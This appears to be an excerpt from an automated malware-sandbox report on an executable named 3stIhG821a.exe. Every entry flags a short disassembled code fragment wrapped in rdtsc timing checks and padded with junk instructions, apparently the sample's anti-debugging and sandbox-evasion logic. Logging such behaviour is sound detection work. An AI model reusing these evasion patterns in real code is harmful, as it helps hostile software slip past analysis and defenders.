Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E5880A second address: E58822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jg 00007FB0E8BCBD0Eh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E58408 second address: E58426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB0E8BCBF79h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E58426 second address: E5842C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E60495 second address: E604A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DCA195 second address: DCA1B3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB0E8BCBD06h 0x00000008 jnc 00007FB0E8BCBD06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jns 00007FB0E8BCBD08h 0x00000016 push edx 0x00000017 push eax 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E5F023 second address: E5F02F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB0E8BCBF66h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E5F02F second address: E5F03F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 je 00007FB0E8BCBD06h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E5F03F second address: E5F050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jne 00007FB0E8BCBF6Eh 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E5F1AA second address: E5F1B4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB0E8BCBD06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E5F322 second address: E5F326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E5F326 second address: E5F343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB0E8BCBD12h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E5F343 second address: E5F362 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBF77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E5F362 second address: E5F366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E5F366 second address: E5F36A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E5F36A second address: E5F372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E5F372 second address: E5F377 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E5F4D4 second address: E5F4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB0E8BCBD14h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E5F4EF second address: E5F52B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB0E8BCBF82h 0x00000008 jmp 00007FB0E8BCBF6Fh 0x0000000d jmp 00007FB0E8BCBF6Dh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007FB0E8BCBF68h 0x0000001c jns 00007FB0E8BCBF6Ch 0x00000022 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E5F52B second address: E5F542 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBD0Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E5F542 second address: E5F546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E5F546 second address: E5F54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E03528 second address: E0352E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E64418 second address: E6441C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E6441C second address: E64441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0E8BCBF77h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007FB0E8BCBF7Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E63A63 second address: E63A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E63D2B second address: E63D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E63D31 second address: E63D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007FB0E8BCBD19h 0x0000000c jmp 00007FB0E8BCBD0Fh 0x00000011 jmp 00007FB0E8BCBD0Eh 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 jp 00007FB0E8BCBD08h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E63D7D second address: E63D83 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E67458 second address: E67476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jp 00007FB0E8BCBD13h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E66B72 second address: E66B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0E8BCBF78h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E66B95 second address: E66B9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E66B9B second address: E66BC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBF77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB0E8BCBF70h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E66E60 second address: E66E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E66E64 second address: E66E89 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB0E8BCBF77h 0x0000000b jbe 00007FB0E8BCBF6Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E66E89 second address: E66E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E697F6 second address: E697FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E697FC second address: E69813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB0E8BCBD12h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E6AE06 second address: E6AE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E721AD second address: E721B7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB0E8BCBD06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E721B7 second address: E721C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FB0E8BCBF6Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E707C1 second address: E707C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E70D7E second address: E70D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E71066 second address: E71070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB0E8BCBD06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E71070 second address: E7107A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB0E8BCBF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E71360 second address: E71364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E71364 second address: E71375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FB0E8BCBF66h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E71673 second address: E71679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E71679 second address: E71685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB0E8BCBF66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E71685 second address: E7168E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E7168E second address: E71692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E71692 second address: E71698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E71C67 second address: E71C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007FB0E8BCBF6Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E75F15 second address: E75F29 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB0E8BCBD16h 0x00000008 jmp 00007FB0E8BCBD0Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E76345 second address: E7634F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB0E8BCBF66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E7634F second address: E76353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E7648D second address: E764AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FB0E8BCBF79h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E764AE second address: E764DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 jmp 00007FB0E8BCBD19h 0x0000000e popad 0x0000000f js 00007FB0E8BCBD10h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E7660E second address: E7661B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 je 00007FB0E8BCBF72h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E76A70 second address: E76A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0E8BCBD0Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E76A80 second address: E76A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FB0E8BCBF66h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E76A8D second address: E76AB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB0E8BCBD15h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FB0E8BCBD0Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E76AB7 second address: E76AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB0E8BCBF73h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E817BB second address: E817BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E8191B second address: E8191F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E8191F second address: E81923 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E81923 second address: E8193B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0E8BCBF72h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E81EAC second address: E81EB2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E81EB2 second address: E81EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007FB0E8BCBF66h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E81FD3 second address: E81FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB0E8BCBD06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E81FDD second address: E81FFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FB0E8BCBF77h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E81FFE second address: E82002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E82002 second address: E82006 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E8213A second address: E82146 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FB0E8BCBD06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E82146 second address: E82173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0E8BCBF73h 0x00000009 jmp 00007FB0E8BCBF76h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E8272E second address: E82734 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E82734 second address: E82739 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E8BA08 second address: E8BA12 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB0E8BCBD0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E8BA12 second address: E8BA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB0E8BCBF6Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E8BA1E second address: E8BA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E8BA2A second address: E8BA30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E8BA30 second address: E8BA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E8BA34 second address: E8BA40 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB0E8BCBF66h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E8BA40 second address: E8BA62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB0E8BCBD17h 0x00000008 jno 00007FB0E8BCBD06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E8BBA5 second address: E8BBB9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007FB0E8BCBF66h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E8BD01 second address: E8BD13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB0E8BCBD06h 0x0000000a ja 00007FB0E8BCBD0Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E8BD13 second address: E8BD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E97A96 second address: E97AB9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB0E8BCBD08h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b jmp 00007FB0E8BCBD16h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E97AB9 second address: E97ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E97ABF second address: E97AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB0E8BCBD0Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E97AD4 second address: E97AD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E9AD1E second address: E9AD26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E9AD26 second address: E9AD2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EA273F second address: EA2743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EAA260 second address: EAA266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EAA266 second address: EAA26C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EB3555 second address: EB3585 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBF70h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FB0E8BCBF70h 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EB3585 second address: EB358B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EB1D8D second address: EB1D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EB1D93 second address: EB1D9D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB0E8BCBD06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
